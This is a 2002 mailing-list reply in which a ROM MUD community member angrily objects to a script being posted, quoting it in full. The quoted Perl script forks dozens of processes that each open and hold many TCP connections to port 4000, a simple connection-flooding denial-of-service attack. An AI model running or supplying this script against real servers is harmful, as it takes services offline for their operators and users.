Why the *CENSORED* are you people POSTING it??????????!!!!!!!!!!

Jesus, people have no common sense these days!

On Mon, 25 Mar 2002 14:01:03 -0600 Mike Barton <[EMAIL PROTECTED]> writes:
> I missed something..
> 
> use Socket;
> > $port = "4000";
> > $host =  "localhost";
> > $this = sockaddr_in($port,inet_aton($host));
> > for (0..30) {
> >   if (!fork()) {
> >     for (0..50) {
> >       my $sock;
> >       socket ($sock, AF_INET, SOCK_STREAM, getprotobyname('TCP'));
> >       connect($sock,$this);
> >     }
> >     sleep;
> >   }
> > }
> > sleep;
> 
> -- 
> ROM mailing list
> [email protected]
> http://www.rom.org/cgi-bin/mailman/listinfo/rom
> 

Reply via email to